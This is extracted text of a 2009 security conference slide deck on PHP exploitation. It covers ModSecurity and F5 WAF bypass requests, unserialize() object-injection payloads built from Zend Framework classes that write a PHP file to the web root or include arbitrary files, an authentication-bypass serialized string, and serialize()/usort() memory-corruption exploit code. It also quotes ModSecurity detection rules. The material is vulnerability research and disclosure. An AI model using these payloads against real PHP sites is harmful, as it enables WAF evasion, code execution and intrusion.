Scribd
Upload
89 views59 pages

POC2009 ShockingNewsInPHPExploitation

Uploaded by

0xjiva
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
89 views59 pages

POC2009 ShockingNewsInPHPExploitation

Uploaded by

0xjiva
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

http://www.sektioneins.

de

Shocking News in PHP Exploitation


PHP
Stefan Esser <[email protected]>

Who am I?

Stefan Esser

from Cologne/Germany Information Security since 1998 PHP Core Developer since 2001 Month of PHP Bugs

Suhosin - Advanced PHP Protection System Head of Research & Development at SektionEins GmbH

Stefan Esser Shocking News in PHP Exploitation November 2009 2

Topics

Web Application Firewall Bypass Vulnerabilities PHP Application Vulnerabilities - Exploiting an old friend of mine PHP Interruptions Vulnerabilities in the light of recent xes

Stefan Esser Shocking News in PHP Exploitation November 2009 3

Part I
Web Application Firewall Bypass Vulnerabilities
a.k.a. poking holes in the rst line of pseudo defense

Stefan Esser Shocking News in PHP Exploitation November 2009 4

Web Application Firewalls (I)

promise the cheap win in web security try to detect malicious HTTP requests and log/block them try to create one parser that matches all parsers used by web
technologies #fail

some rely on rulesets to detect known attack patterns other try to detect known good requests

Stefan Esser Shocking News in PHP Exploitation November 2009 5

Web Application Firewalls (II) - Attacks

Attacking Rules
obfuscate payload to not match rules exploit weaknesses in rules

Attacking Parsers
manipulate HTTP requests to fool WAFs exploit bufferoverows / memory corruptions

Stefan Esser Shocking News in PHP Exploitation November 2009 6

ModSecurity CORERULES

standard ruleset for ModSecurity installations contains a lot of rules to detect attacks rules shown to be ineffective by
Eduardo Vela Nava and David Lindsay at BlackHat USA 2009

nowadays also rips ^H^H^H contains the PHPIDS rules

Stefan Esser Shocking News in PHP Exploitation November 2009 7

ModSecurity CORERULES - PHPIDS Ruleset (I)


# # # # # # # --------------------------------------------------------------Core ModSecurity Rule Set ver.2.0.2 Copyright (C) 2006-2009 Breach Security Inc. All rights reserved. The ModSecuirty Core Rule Set is distributed under GPL version 2 Please see the enclosed LICENCE file for full details. ---------------------------------------------------------------

# # PHP-IDS rules (www.php-ids.org) # https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml # # # Identify Comment Evasion Attempts # SecRule REQUEST_URI|REQUEST_BODY|XML:/* "(?:\<!-|-->|\/\*|\*\/|\/\/\W*\w+\s*$)" "phase: 2,capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Comment Evasion Attempt',tag:'WEB_ATTACK/EVASION',logdata:'% {TX.0}',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+10,setvar:tx.% {rule.id}-WEB_ATTACK/EVASION-%{matched_var_name}=%{matched_var}" SecRule REQUEST_URI|REQUEST_BODY|XML:/* "(?:--[^-]*-)" "phase: 2,capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Comment Evasion Attempt',tag:'WEB_ATTACK/EVASION',logdata:'% {TX.0}',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+10,setvar:tx.% {rule.id}-WEB_ATTACK/EVASION-%{matched_var_name}=%{matched_var}" ...

Stefan Esser Shocking News in PHP Exploitation November 2009 8

ModSecurity CORERULES - PHPIDS Ruleset (II)


# # Attack Signatures # SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:\<\w*:?\s(?:[^\>]*)t(?!rong))|(?:\<scri)| (<\w+:\w+)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace ,t:lowercase,ctl:auditLogParts=+E,block,nolog,auditlog,msg:'Detects obfuscated script tags and XML wrapped HTML',id:'phpids-33',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.% {rule.id}-WEB_ATTACK-%{matched_var_name}=%{matched_var}" SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[^\w\s=]on(?!g\&gt;)\w+[^=_+-]*=[^$]+(?: \W|\&gt;)?)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace ,t:lowercase,ctl:auditLogParts=+E,block,nolog,auditlog,msg:'Detects possible event handlers',id:'phpids-32',tag:'WEB_ATTACK',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}-WEB_ATTACK-% {matched_var_name}=%{matched_var}" SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[\w.-]+@[\w.-]+%(?:[01][\db-ce-f])+\w+:)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace ,t:lowercase,ctl:auditLogParts=+E,block,nolog,auditlog,msg:'Detects common mail header injections',id:'phpids-63',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.% {rule.id}-WEB_ATTACK-%{matched_var_name}=%{matched_var}" SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:,\s*(?:alert|showmodaldialog|eval)\s*,)| (?::\s*eval\s*[^\s])|([^:\s\w,.\/?+-]\s*)?(?<![a-z\/_@])(\s*return\s*)?(?:(?:documen...
Stefan Esser Shocking News in PHP Exploitation November 2009 9

Lets analyse a single rule


SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[^\w\s=]on(?!g \&gt;)\w+[^=_+-]*=[^$]+(?:\W|\&gt;)?)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComment s,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Detects possible event handlers',id:'phpids-32',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}WEB_ATTACK-%{matched_var_name}=%{matched_var}"

variables the rule is applied to regular expression phase the rule is executed in transformation functions action, message, id, tag, logging, scoring

Stefan Esser Shocking News in PHP Exploitation November 2009 10

Lets analyse a single rule


SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[^\w\s=]on(?!g \&gt;)\w+[^=_+-]*=[^$]+(?:\W|\&gt;)?)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComment s,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Detects possible event handlers',id:'phpids-32',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}WEB_ATTACK-%{matched_var_name}=%{matched_var}"

variables the rule is applied to regular expression phase the rule is executed in transformation functions action, message, id, tag, logging, scoring

Stefan Esser Shocking News in PHP Exploitation November 2009 11

Lets analyse a single rule


SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[^\w\s=]on(?!g \&gt;)\w+[^=_+-]*=[^$]+(?:\W|\&gt;)?)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComment s,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Detects possible event handlers',id:'phpids-32',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}WEB_ATTACK-%{matched_var_name}=%{matched_var}"

variables the rule is applied to regular expression phase the rule is executed in transformation functions action, message, id, tag, logging, scoring

Stefan Esser Shocking News in PHP Exploitation November 2009 12

Lets analyse a single rule


SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[^\w\s=]on(?!g \&gt;)\w+[^=_+-]*=[^$]+(?:\W|\&gt;)?)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComment s,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Detects possible event handlers',id:'phpids-32',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}WEB_ATTACK-%{matched_var_name}=%{matched_var}"

variables the rule is applied to regular expression phase the rule is executed in transformation functions action, message, id, tag, logging, scoring

Stefan Esser Shocking News in PHP Exploitation November 2009 13

Lets analyse a single rule


SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:[^\w\s=]on(?!g \&gt;)\w+[^=_+-]*=[^$]+(?:\W|\&gt;)?)" "phase: 2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComment s,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts= +E,block,nolog,auditlog,msg:'Detects possible event handlers',id:'phpids-32',tag:'WEB_ATTACK',logdata:'%{TX. 0}',severity:'2',setvar:'tx.msg=% {rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}WEB_ATTACK-%{matched_var_name}=%{matched_var}"

variables the rule is applied to regular expression phase the rule is executed in transformation functions action, message, id, tag, logging, scoring

Stefan Esser Shocking News in PHP Exploitation November 2009 14

Bypassing the Rule (I)

REQUEST_BODY
is emtpy for multipart/form-data POST request converted PHPIDS rules will not nd any attack
in POSTs if content-type header says multipart/form-data

also affects most other CORERULES no protection at all

Stefan Esser Shocking News in PHP Exploitation November 2009 15

Bypassing the Rule (II)

Rules apply all transformation functions rst


t:none - reset t:urlDecodeUni - url decoding with unicode support t:htmlEntityDecode - decodes HTML entities t:replaceComments - removes all comments t:compressWhitespace - compresses whitespace

Stefan Esser Shocking News in PHP Exploitation November 2009 16

Bypassing the Rule (III)

t:none
index.php?x=%2F*&var=+UNION+SELECT+*+FROM+user+%26%23x2f*

t:urlDecodeUni
index.php?x=/*&var= UNION SELECT * FROM user &#x2f*

t:urlHtmlEntityDecode
index.php?x=/*&var= UNION SELECT * FROM user /*

t:replaceComments
index.php?x= <- ModSecurity cannot nd any attack in here

Stefan Esser Shocking News in PHP Exploitation November 2009 17

modsecurity.conf-minimal vs. CORERULES


modsecurity.conf-minimal warns
# By default be strict with what we accept in the multipart/form-data # request body. If the rule below proves to be too strict for your # environment consider changing it to detection-only. You are encouraged # _not_ to remove it altogether. SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ "phase:2,t:none,log,deny,msg:'Multipart request body \ failed strict validation: \ PE %{REQBODY_PROCESSOR_ERROR}, \ BQ %{MULTIPART_BOUNDARY_QUOTED}, \ BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ DB %{MULTIPART_DATA_BEFORE}, \ DA %{MULTIPART_DATA_AFTER}, \ HF %{MULTIPART_HEADER_FOLDING}, \ LF %{MULTIPART_LF_LINE}, \ SM %{MULTIPART_SEMICOLON_MISSING}'"

rule not dened in CORERULES installing only CORERULES leaves you vulnerable
Stefan Esser Shocking News in PHP Exploitation November 2009 18

Fun with multipart/form-data requests (I)

POST /test.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (...) Gecko/1234 Firefox/3.5.3 Content-Length: ... Content-Type: multipart/form-data; boundary=----xxxx ------xxxx Content-Disposition: form-data; name="msg" Speaking about wget triggers modsecurity ------xxxx Content-Disposition: form-data; name="multi" submit ------xxxx--

Stefan Esser Shocking News in PHP Exploitation November 2009 19

Fun with multipart/form-data requests (II)


POST /test.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (...) Gecko/1234 Firefox/3.5.3 Content-Length: ... Content-Type: multipart/form-data; boundary=----xxxx ------xxxx-------xxxx Content-Disposition: form-data; name="msg" With only CORERULES installed you can speak about wget ------xxxx Content-Disposition: form-data; name="multi" submit ------xxxx--

Stefan Esser Shocking News in PHP Exploitation November 2009 20

Fun with multipart/form-data requests (III)

Did I mention that...


MULTIPART_STRICT_ERROR does not protect you either ModSecuritys paranoid multipart/form-data parser can be tricked commercial WAFs are broken even more

Stefan Esser Shocking News in PHP Exploitation November 2009 21

Fun with multipart/form-data requests (IV)

POST /test.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (...) Gecko/1234 Firefox/3.5.3 Content-Length: ... Content-Type: multipart/form-data; boundary=----xxxx ------xxxx
Content-Disposition: form-data; name=';filename="';name=payload;"

For ModSecurity I am a file - bypassing all rules ------xxxx Content-Disposition: form-data; name="multi" submit ------xxxx--

Stefan Esser Shocking News in PHP Exploitation November 2009 22

Fun with multipart/form-data requests (V)

POST /test.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (...) Gecko/1234 Firefox/3.5.3 Content-Length: ... Content-Type: multipart/form-data; boundary=----xxxx ------xxxx
Content-Disposition: form-data; name=';filename="';name=payload;"

For PHP I am a normal variable ------xxxx Content-Disposition: form-data; name="multi" submit ------xxxx--

Stefan Esser Shocking News in PHP Exploitation November 2009 23

F5 BIGIP ASM

Remeber that...
commercial WAFs are broken even more

Following F5 BIGIP ASM vulnerability was reported in August to F5...

Stefan Esser Shocking News in PHP Exploitation November 2009 24

multipart/form-data - F5 BIGIP ASMs view


POST /test.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (...) Gecko/1234 Firefox/3.5.3 Content-Length: ... Content-Type: multipart/form-data; boundary=----,xxxx ------,xxxx Content-Disposition: form-data; name="img"; filename= "img.gif" GIF89a... -----Content-Disposition: form-data; name="payload1" ... -----Content-Disposition: form-data; name="payload2" ... -------------,xxxx-Stefan Esser Shocking News in PHP Exploitation November 2009 25

multipart/form-data - PHPs view


POST /test.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (...) Gecko/1234 Firefox/3.5.3 Content-Length: ... Content-Type: multipart/form-data; boundary=----,xxxx ------,xxxx Content-Disposition: form-data; name="img"; filename= "img.gif" GIF89a... -----Content-Disposition: form-data; name="payload1" ... -----Content-Disposition: form-data; name="payload2" ... -------------,xxxx-Stefan Esser Shocking News in PHP Exploitation November 2009 26

Part II
PHP Application Vulnerabilities - Exploiting an old friend

Stefan Esser Shocking News in PHP Exploitation November 2009 27

PHPs unserialize() (I)


deserializes serialized PHP variables
a:3:{i:5;O:9:"TestClass":2:{s:7:"\0*\0pro1";i:123;s: 15:"\0TestClass\0pro2";i:123;}i:123;b:1;i:1337;a:3:{i:0;N;i: 1;i:5;i:2;a:1:{i:0;O:10:"OtherClass":4:{s:16:"\0OtherClass \0pro1";s:6:"ABCDEF";s:16:"\0OtherClass\0pro2";s:3:"ABC";s: 16:"\0OtherClass\0pro3";R:2;s:16:"\0OtherClass\0pro4";N;}}}}

supported variable types (extract)


N; b:1; i:5; s:5:"ABCDE"; S:5:"\65\66\67\68\69"; a:3:{...} O:9:"TestClass":1:{...} R:1;

Stefan Esser Shocking News in PHP Exploitation November 2009 28

PHPs unserialize() (II)

should never be used on user input because when used can lead to low and high level vulnerabilities has been used in popular open source projects like phpBB2 is still used in many closed source projects and some open source projects
e.g. Zend Server, Magento, PHP-IDS, ...

Stefan Esser Shocking News in PHP Exploitation November 2009 29

PHPs unserialize() (III)

is an old friend of mine



MOPB-29-2007:PHP 5.2.1 unserialize() Information Leak Vulnerability http://www.php-security.org/MOPB/MOPB-29-2007.html MOPB-05-2007:PHP unserialize() 64 bit Array Creation Denial of Service Vulnerability http://www.php-security.org/MOPB/MOPB-05-2007.html MOPB-04-2007:PHP 4 unserialize() ZVAL Reference Counter Overow http://www.php-security.org/MOPB/MOPB-04-2007.html Advisory 09/2006: PHP unserialize() Array Creation Integer Overow http://www.hardened-php.net/advisory_092006.133.html Advisory 01/2004 - PHP unserialize() Negative Reference Memory Corruption Vulnerability and PHP unserialize() Reference To Dangling Pointers Memory Corruption Vulnerability http://www.hardened-php.net/advisory_012004.42.html

Stefan Esser Shocking News in PHP Exploitation November 2009 30

PHPs unserialize() (IV)

still contains a simple Denial of Service Vulnerability


a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a: 1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1: {a:1:{a:1:{...

Stefan Esser Shocking News in PHP Exploitation November 2009 31

PHPs unserialize() (V)

Can lead to High Level Vulnerabilities


<?php $data = unserialize($autologin); if ($data['username'] == $adminName && $data['password'] == $adminPassword) { $admin = true; } else { $admin = false; }

Exploitable because == is used instead of ===


a:2:{s:8:"username";b:1;s:8:"password";b:1;}

Stefan Esser Shocking News in PHP Exploitation November 2009 32

PHPs unserialize() and Objects (I)

can unserialize() objects will call __wakeup() on unserialized objects therefore a potential security problem no useful real world example because of lack of __wakeup() methods harmless __wakeup() methods

Stefan Esser Shocking News in PHP Exploitation November 2009 33

PHPs unserialize() and Objects (II)

many people oversee new dangers since PHP 5 __destruct() method object autoloading for years I was searching for a useful real world example only demo I did so far allowed to unlink() an arbitrary le

Stefan Esser Shocking News in PHP Exploitation November 2009 34

SektionEins unserialize() Research Project

now in 2009 there is more and more object oriented PHP code more and more people use standard frameworks more and more objects come with __destruct() methods searching for a standard framework with useful __destruct() methods

Stefan Esser Shocking News in PHP Exploitation November 2009 35

unserialize() in Zend Framework Applications (I)

Zend Framework contains automatic autoload support a lot of objects some useless __wakeup() methods a lot of useful __destruct() methods

Stefan Esser Shocking News in PHP Exploitation November 2009 36

unserialize() in Zend Framework Applications (II)

SektionEins has developed generic exploits that can upload arbitrary les execute arbitrary PHP code (ZF >= 1.8.0) send arbitrary emails (ZF >= 1.8.0) include arbitrary les (ZF >= 1.9.0)

Stefan Esser Shocking News in PHP Exploitation November 2009 37

Disclaimer

This is NOT a vulnerability in Zend Framework The vulnerability is that some applications based on Zend
Framework still use unserialize() on user input

Using PHP-IDS <= 0.6.2 in applications based on the Zend


Framework also made them vulnerable

Will only show the le upload and le include exploit path Exploit path for direct PHP code execution keeps hidden for now

Stefan Esser Shocking News in PHP Exploitation November 2009 38

Zend_Pdf_ElementFactory_Proxy
Exploit based on Zend Framework 1.7 .0 Exploit tries to be as easy as possible Exploit using only classes of the same tree would be more complex but possible

class Zend_Pdf_ElementFactory_Proxy implements Zend_Pdf_ElementFactory_Interface { ... public function __destruct() { $this->_factory->close(); $this->_factory = null; }

Zend_Pdf_ElementFactory_Proxy _factory

Stefan Esser Shocking News in PHP Exploitation November 2009 39

Zend_Search_Lucene_Index_SegmentWriter_StreamWriter
class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter extends Zend_Search_Lucene_Index_SegmentWriter { ... /** * Close segment, write it to disk and return segment info * * @return Zend_Search_Lucene_Index_SegmentInfo */ public function close() Zend_Search_Lucene_Index_SegmentWriter_StreamWriter { if ($this->_docCount == 0) { _docCount return null; _directory } _elds $this->_dumpFNM(); $this->_generateCFS();
_les _name

return new Zend_Search_Lucene_Index_SegmentInfo($this->_directory, $this->_name,$this->_docCount,-1,null,true,true); } }

Stefan Esser Shocking News in PHP Exploitation November 2009 40

Zend_Search_Lucene_Index_SegmentWriter
abstract class Zend_Search_Lucene_Index_SegmentWriter { ... /** * Dump Field Info (.fnm) segment file */ protected function _dumpFNM() { $fnmFile = $this->_directory->createFile($this->_name . '.fnm'); $fnmFile->writeVInt(count($this->_fields)); $nrmFile = $this->_directory->createFile($this->_name . '.nrm'); // Write header $nrmFile->writeBytes('NRM'); // Write format specifier $nrmFile->writeByte((int)0xFF); foreach ($this->_fields as $field) { $fnmFile->writeString($field->name); $fnmFile->writeByte(($field->isIndexed ? 0x01 : 0x00) | ($field->storeTermVector ? 0x02 : 0x00)); ... } $this->_files[] = $this->_name . '.fnm'; $this->_files[] = $this->_name . '.nrm'; }
Stefan Esser Shocking News in PHP Exploitation November 2009 41

Putting it all together...


Zend_Pdf_ElementFactory_Proxy _factory

Zend_Search_Lucene_Storage_Directory_Filesystem _dirPath= /var/www/malicious.php\0 Zend_Search_Lucene_Index_SegmentWriter_StreamWriter _docCount = 1 _directory _elds = array() _les = new StdClass() _name = XXX Zend_Search_Lucene_Index_FieldInfo name= <?php phpinfo();die();?> O:29:"Zend_Pdf_ElementFactory_Proxy":1:{s:39:"\0Zend_Pdf_ElementFactory_Proxy \0_factory";O:51:"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter":5:{s:12:"\0* \0_docCount";i:1;s:13:"\0*\0_directory";O: 47:"Zend_Search_Lucene_Storage_Directory_Filesystem":1:{s:11:"\0*\0_dirPath";s:23:"/var/ www/malicious.php\0";}s:8:"\0*\0_name";s:5:"dummy";s:10:"\0*\0_elds";a:1:{i:0;O: 34:"Zend_Search_Lucene_Index_FieldInfo":1:{s:4:"name";s:24:"<?php phpinfo();die();?>";}}s: 9:"\0*\0_les";O:8:"stdClass":0:{}}}
Stefan Esser Shocking News in PHP Exploitation November 2009 42

Zend_Queue_Adapter_Activemq

class Zend_Queue_Adapter_Activemq extends Zend_Queue_Adapter_AdapterAbstract { ... /** * Close the socket explicitly when destructed * * @return void */ public function __destruct() { // Gracefully disconnect $frame = $this->_client->createFrame(); $frame->setCommand('DISCONNECT'); $this->_client->send($frame); unset($this->_client); }

Zend_Queue_Adapter_Activemq _client

Stefan Esser Shocking News in PHP Exploitation November 2009 43

Zend_Queue_Stomp_Client_Connection
class Zend_Queue_Stomp_Client_Connection implements Zend_Queue_Stomp_Client_ConnectionInterface { ... public function getFrameClass() { return isset($this->_options['frameClass']) ? $this->_options['frameClass'] : 'Zend_Queue_Stomp_Frame'; } Zend_Queue_Stomp_Client_Connection public function createFrame() { $class = $this->getFrameClass(); if (!class_exists($class)) { require_once 'Zend/Loader.php'; Zend_Loader::loadClass($class); } $frame = new $class(); ...
_options[frameClass]

Stefan Esser Shocking News in PHP Exploitation November 2009 44

Putting it all together...

Zend_Queue_Adapter_Activemq _client

Zend_Queue_Stomp_Client_Connection _options[frameClass] = /var/www/malicious

O:27:"Zend_Queue_Adapter_Activemq":1:{s: 36:"\0Zend_Queue_Adapter_Activemq\0_client";O: 34:"Zend_Queue_Stomp_Client_Connection":1:{s:11:"\0* \0_options";a:1:{s:10:"frameClass";s:18:"/var/www/malicious";}}}

Stefan Esser Shocking News in PHP Exploitation November 2009 45

Part III
Bypassing Recent Fixes against Interruption Vulnerabilities

Stefan Esser Shocking News in PHP Exploitation November 2009 46

Interruption Vulnerabilities (I)

Vulnerabilities based on interrupting internal functions and


manipulating the variables they work with

Interrupting by user space error handler __toString() functions user space handlers (session, stream, lter) other user space callbacks Interruption leads to information leak, memory corruption, DOS

Stefan Esser Shocking News in PHP Exploitation November 2009 47

Interruption Vulnerabilities (II)

Class of bugs rst disclosed during Month of PHP Bugs Largely ignored until SyScan / BlackHat USA 2009 State of the Art Exploitation of Hardened PHP Environments Vulnerabilities allow to construct stable local PHP exploits Help to overcome PHP internal and external protections

Stefan Esser Shocking News in PHP Exploitation November 2009 48

Interruption Vulnerabilities (III)

explode() Information Leak Exploit


relies on CalltimePassByRef allowing to force pass by reference xed in PHP 5.2.11 by removing CalltimePassByRef protection is solid - a new info leak exploit is required

usort() Memory Corruption Exploit


removes elements from array while it is sorted PHP 5.2.11 adds a copy on write protection protection can be bypassed easily

Stefan Esser Shocking News in PHP Exploitation November 2009 49

Info Leak Vulnerability in serialize()


if (zend_hash_find(Z_OBJPROP_P(struc), Z_STRVAL_PP(name), Z_STRLEN_PP(name) + 1, (void *) &d) == SUCCESS) { php_var_serialize_string(buf, Z_STRVAL_PP(name), Z_STRLEN_PP(name)); php_var_serialize_intern(buf, *d, var_hash TSRMLS_CC); } else { ... if (ce) { ... do { ... php_error_docref(NULL TSRMLS_CC, E_NOTICE, "\"%s\" returned as member variable from __sleep() but does not exist", Z_STRVAL_PP(name)); php_var_serialize_string(buf, Z_STRVAL_PP(name), Z_STRLEN_PP(name)); php_var_serialize_intern(buf, nvalp, var_hash TSRMLS_CC); } while (0); } else { ... } }

when __sleep() returns non existant property names a PHP notice is generated error handler can modify the name before it is added to the serialized form not affected by call-time pass by reference

Stefan Esser Shocking News in PHP Exploitation November 2009 50

Exploiting serialize()
class exploit { function error($a,$b) { parse_str("x=x",$this->string); return 1; } function __sleep() { return array(&$this->string); } function execute() { $this->string = str_repeat("A", 128); set_error_handler(array($this, "error")); $x = serialize($this); restore_error_handler(); $x = strstr($x, ":128:"); $x = substr($x, 6, 128); hexdump($x); }

setup an error handler that uses


parse_str() to overwrite the string ZVAL with an array ZVAL

create an __sleep() handler


that returns a reference to a string instead of the property name

create a string variable with a size


that equals the bytes to leak

call serialize() restore error handler to cleanup extract memory from


serialized string
}

Stefan Esser Shocking News in PHP Exploitation November 2009 51

Information Leaked by a PHP Array


sizeof(int) - sizeof(long) - sizeof(void *) endianess (08 00 00 00 vs. 00 00 00 08) pointer to buckets pointer to bucket array pointer into code segment
Hexdump ------00000000: 00000010: 00000020: 00000030: 00000040: 00000050: 00000060: 00000070: 08 E8 A6 39 C0 31 F4 00 00 69 1A 00 69 00 69 00 00 7A 26 00 7A 00 7A 00 00 00 00 00 00 00 00 00 07 E8 00 B8 01 19 D0 00 00 69 00 69 00 00 69 00 00 7A 01 7A 00 00 7A 00 00 00 00 00 00 00 00 00 02 40 11 19 01 02 40 00 00 6A 00 00 00 00 6A 00 00 7A 00 00 00 00 7A 00 00 00 00 00 00 00 00 00 FF A0 31 11 06 00 00 00 typedef struct _hashtable { uint nTableSize; uint nTableMask; uint nNumOfElements; ulong nNextFreeElement; Bucket *pInternalPointer; Bucket *pListHead; Bucket *pListTail; Bucket **arBuckets; dtor_func_t pDestructor; zend_bool persistent; unsigned char nApplyCount; zend_bool bApplyProtection; } HashTable;

00 51 00 00 00 00 00 00

00 7A 00 00 00 00 00 00

00 00 00 00 00 00 00 00

................ [email protected]. ..&.........1... 9....iz......... .iz............. 1............... .iz..iz.@jz..... ................

Stefan Esser Shocking News in PHP Exploitation November 2009 52

usort() - Corrupting memory


user space compare function removes an
element from the _SESSION array
(other arrays are copy on write protected)

bucket_1

sorting function will sort a bucket that was


already freed from memory bucket_2
&bucket_1 &bucket_2 &bucket_3 &bucket_4 &bucket_5

reconstructed array will contain an


uninitialized bucket in it
<?php function usercompare($a, $b) { if (isset($_SESSION['XXX'])) { session_unregister('XXX'); } return 0; } $_SESSION = array('XXA' 'XXX' 'XXB' 'XXC' 'XXD' => => => => => "entry_1", "entry_2", "entry_3", "entry_4", "entry_5");

bucket_3

bucket_4

@usort($_SESSION, "usercompare"); ?>

bucket_5

Stefan Esser Shocking News in PHP Exploitation November 2009 53

Memory corruption - what now?


bucket_1

fake bucket
&bucket_1 &bucket_2 &bucket_3 &bucket_4 &bucket_5

fake string ZVAL

bucket_3

bucket_4

0x00000000

0x7FFFFFFF

bucket_5

Stefan Esser Shocking News in PHP Exploitation November 2009 54

Setting up the fake_bucket

fake_bucket
2 0 **fake_zval 0x11111111 0x22222222 0x33333333 0x44444444 0x55555555 *fake_zval 0x00000000

0x7FFFFFFF 1

will be overwritten by sorting process

IS_STRING 0

fake_zval (PHP 5)

fake structures are in normal PHP strings can be changed anytime

Stefan Esser Shocking News in PHP Exploitation November 2009 55

Putting the fake_bucket in place

clear_free_memory_cache() - allocate many blocks from 1 to 200 bytes use global variables with long names so that they do not t into the same bucket create a global string variable that holds the fake_bucket
<?php function usercompare($a, $b) { global $fake_bucket, $_SESSION; if (isset($_SESSION['XXX'])) { clear_free_memory_cache(); session_unregister('XXX'); $GLOBALS['_______________________________________________________________1'] = 1; $GLOBALS['_______________________________________________________________2'] = 2; $GLOBALS['PLACEHOLDER_FOR_OUR_FAKE_BUCKET_________________________________'].= $fake_bucket; } return 0; } ?>

Stefan Esser Shocking News in PHP Exploitation November 2009 56

Everything is in place

_SESSION variable now contains our fake string read and write access anywhere in memory
<?php $memory = &$_SESSION['XXX'];

$read = $memory[0x41414141]; $memory[0x41414141] = $write; ?>

Stefan Esser Shocking News in PHP Exploitation November 2009 57

Part V
Demonstration

Stefan Esser Shocking News in PHP Exploitation November 2009 58

Time for questions...

shameless self plug get your web applications audited by the experts

